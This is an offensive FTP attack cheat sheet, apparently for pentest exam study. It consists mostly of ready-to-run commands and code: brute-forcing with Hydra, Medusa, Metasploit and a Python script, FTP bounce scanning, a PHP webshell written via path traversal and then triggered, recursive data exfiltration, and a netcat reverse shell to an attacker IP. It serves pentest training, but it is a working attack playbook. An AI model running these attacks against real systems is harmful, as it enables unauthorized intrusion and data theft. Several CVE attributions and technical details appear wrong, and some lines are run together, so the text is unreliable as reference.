FTP
Learning Objectives:
Understand FTP protocol basics, modes (Active/Passive), and common misconfigurations.
Perform comprehensive enumeration and brute-forcing.
Exploit legacy and modern vulns, including bounce attacks and file writes.
Automate tasks for efficiency in time-constrained exams.
Chain FTP exploits to RCE or pivoting.
Practice Tips:
Use vulnerable VMs like DVWA, Metasploitable, or VulnHub's FTP-specific boxes.
Labs: TryHackMe's "FTP" room, HackTheBox's "Resolute" (for FTPS chaining).
Common Pitfalls: Firewall blocks on data ports (21/20); assume Passive mode; always check for FTPS (port 990).
Exam Scenario: Enumerate an open FTP, brute-force creds, upload a webshell, and escalate via misconfig.
FTP Protocol Overview
The File Transfer Protocol (FTP) is a standard for transferring files over TCP/IP networks. It supports directory/file ops (e.g., ls, cd, get/put) and operates in Active (server initiates data connection) or Passive (client initiates) modes.
Default ports: Control: TCP/21,
Data: TCP/20 (Active) or ephemeral (Passive). FTPS (FTP over SSL/TLS) uses TCP/990 (implicit) or 21 (explicit).
Attacks target: Misconfigs (anonymous access), weak auth, vulns (e.g., buffer overflows), or abuse (bounce/port scans).
Always start with recon to map the attack surface. 0. Initial Service Discovery
# Basic service scan with version detection
sudo nmap -sC -sV -p 21 --script-args=unsafe=1 -T4 <TARGET-IP>
# Aggressive scan for maximum information
sudo nmap -A -p 21 -T4 <TARGET-IP>
# Quick banner grab with netcat
nc -nv <TARGET-IP> 211. Enumeration & Recon
Identify FTP services, versions, and low-hanging fruit like anonymous access.
Nmap Scanning (Enhanced) Basic script scan + version detection + aggressive scripting for FTP-specific checks (e.g., anonymous login attempts).
sudo nmap -sC -sV --script ftp-anon,ftp-bounce,ftp-ftps,ftp-vuln* -p 21,20,990 <FQDN/IP>Why improved: Adds scripts for vuln detection (e.g., CVE-1999-0017 for bounce) and FTPS support.
Banner Grabbing (Manual) Extract version/info from raw banner for targeted exploits.
telnet <FQDN/IP> 21 # Or nc -v <FQDN/IP> 21; type 'QUIT' to exitOutput example: "220 ProFTPD 1.3.5 Server (Example)". Tip: Cross-reference with Exploit-DB for CVEs (e.g., search "ProFTPD 1.3.5").
Anonymous Authentication Check Test default/public access (common in misconfigs).
ftp <FQDN/IP>
# At login prompt:
Name: anonymous | Password: anonymous (or blank/guest)
# Post-login:
ls -la
# Enumerate files/dirs for sensitive data (e.g., .ssh keys)Enhanced: If successful, download all: mget * or script with lftp -u anonymous,anonymous IP -e "mirror; quit".
User Enumeration via Error Messages Probe for valid users by observing login responses (some servers leak via "530 Invalid user").
# Python one-liner (or use ftplib module)
python3 -c "import ftplib; f=ftplib.FTP('<IP>'); try: f.login('admin',''); print('Valid user') except: print('Invalid')"Tip: Chain with wordlists /usr/share/wordlists/dirb/common.txt for usernames.
2. Brute-Force Attacks
Target weak creds. Use rate-limiting evasion (e.g., delays) in exams.
Hydra (Improved Syntax) Multi-threaded, supports FTP/FTPS.
# Single user brute force
hydra -l <username> -P /usr/share/wordlists/rockyou.txt ftp://<TARGET-IP> -t 4 -V
# User list brute force
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
-P /usr/share/wordlists/rockyou.txt ftp://<TARGET-IP> -t 4
# For FTPS: hydra ... ftps://<IP>:990Why better: Added user list (-L); -t limits threads to avoid DoS flags.
Medusa Parallel brute-forcer.
medusa -h <TARGET-IP> -U /path/to/userlist -P /path/to/passwordlist -M ftp -F
medusa -h <FQDN/IP> -u admin -P /usr/share/wordlists/rockyou.txt -M ftp -T 10Enhanced: -T for threads; test multiple users with -U file.
Metasploit FTP Login Modular scanner for integration with exploits.
msfconsole -q
use auxiliary/scanner/ftp/ftp_login
set RHOSTS <IP>
set USER_FILE /usr/share/wordlists/dirb/common.txt
set PASS_FILE /usr/share/wordlists/rockyou.txt
set STOP_ON_SUCCESS true
set THREADS 5
runOn success, note creds for later use.
Automated Python Brute-Force (New: Scripting for Exams) Custom script for stealthy, resumable attacks.
import ftplib
import sys
host = '<IP>'
userlist = open('/usr/share/wordlists/dirb/common.txt').readlines()
passlist = open('/usr/share/wordlists/rockyou.txt').readlines()
for user in userlist:
user = user.strip()
for passwd in passlist[:10]: # Limit for demo; remove in practice
passwd = passwd.strip()
try:
ftp = ftplib.FTP(host)
ftp.login(user, passwd)
print(f'Success: {user}:{passwd}')
ftp.quit()
sys.exit(0)
except ftplib.error_perm:
passRun: python3 ftp_brute.py. Tip: Add delays (time.sleep(1)) to evade locks.
3. Exploitation Techniques
Exploit vulns or abuse features for RCE/access.
FTP Bounce Attack (Port Scanning) Uses an FTP server as a proxy to scan internal hosts.
nmap -Pn -n -v -p 80 -b <IP>:21:anonymous:anonymous <target_internal_IP>
# Or manual: nc <FTP_IP> 21; PORT <internal_IP>,80; RETR /etc/passwd (triggers bounce)Enhanced: Specify creds explicitly; test on closed ports for stealth.
CoreFTP Arbitrary File Write (Path Traversal) Exploits weak path handling for out-of-dir writes (CVE-2012-4921 variant).
curl -k --insecure -X PUT -H "Host: <IP>" --basic -u <user>:<pass> --data-binary "<?php system(\$_GET['cmd']); ?>" --path-as-is "https://<IP>:990/../../../../../../../var/www/html/shell.php"Why improved: Added PHP webshell payload; use for FTPS (-k for SSL). Verify: curl http://IP/shell.php?cmd=id.
ProFTPD Mod_Copy RCE (New: Common Vuln Exploit) CVE-2021-46875: Remote command execution via copy.
# Manual (post-auth)
SITE CPFR /etc/passwd
SITE CPTO /var/www/html/pwned.txt # Copies file; chain to webshell uploadMetasploit: use exploit/unix/ftp/proftpd_modcopy_exec; set RHOSTS IP; exploit. Exam tip: Check Nmap for ProFTPD versions <1.3.5.
Directory Traversal & Webshell Upload (Post-Auth Abuse) After login, escape root and upload payloads.
# Via FTP client
cd ../../../../../../var/www/html # Traverse up/down
put shell.php # Local file: <?php system($_GET['c']); ?>Automated: lftp -u user,pass IP -e "cd ../../../../var/www/html; put shell.php; quit". Trigger: curl http://IP/shell.php?c=whoami. Pitfall: Ensure the web server runs on the same host.
FTPS-Specific Attacks (SSL/TLS Weaknesses) If FTPS is detected, target weak ciphers or cert issues.
# Test SSL with nmap
nmap --script ssl-cert,ssl-enum-ciphers -p 990 <IP>
# Brute with sslscan or testssl.sh
testssl.sh <IP>:990Exploit: Use openssl s_client -connect IP:990 -cipher LOW to force weak ciphers for MiTM.
4. Post-Exploitation & Pivoting
Leverage access for deeper access.
FTP Client Commands Manual File System Interaction Core ops + advanced for data exfil/escalation.
# Essential commands:
status # Connection status
pwd # Print working directory
ls -la # List with details (perms, owners)
cd <dir> / pwd # Navigate; print working dir
get <file> # Download (e.g., get config.ini)
mget *.txt *.conf # Multi-download patterns
put <local> # Upload (e.g., put /tmp/backdoor)
mput *.php # Multi-upload
mkdir <dir> / rmdir <dir> # Create/delete dirs
rename <old> <new> # Rename for evasion
quote "SITE CHMOD 777 <file>" # Change perms (if supported)
help / ? # Command help
quit # ExitUse Passive mode (passive) if Active fails. Automated Data Exfiltration
# Recursive download with wget
wget -m --ftp-user=<username> --ftp-password=<password> ftp://<TARGET-IP>/
# Recursive mirror with lftp
lftp -u <username>,<password> -p 21 <TARGET-IP>
mirror / /local/path/Pivoting via FTP (Network Abuse): Upload nc/SSH keys for reverse shells.
# Upload and exec (if writable /tmp)
put nc.exe # Then: nc -e /bin/sh <attacker_IP> 4444Chain: Use for internal scans: nmap -sT -p 445 <internal_range> --source-port 21 (spoof via bounce).
Training Drills & Review
Hands-On Lab: Set up Metasploitable2; run full workflow (enumerate → brute → exploit → shell).
Scenario Quiz: "FTP on 21 is anon-enabled, but FTPS on 990 has weak creds—how to chain?" (Ans: Brute FTPS, upload to web root).
Time It: Aim for <10 min full attack in exam sims.
Resources: OWASP FTP Cheat Sheet, SANS SEC560 notes, Exploit-DB searches.
Last updated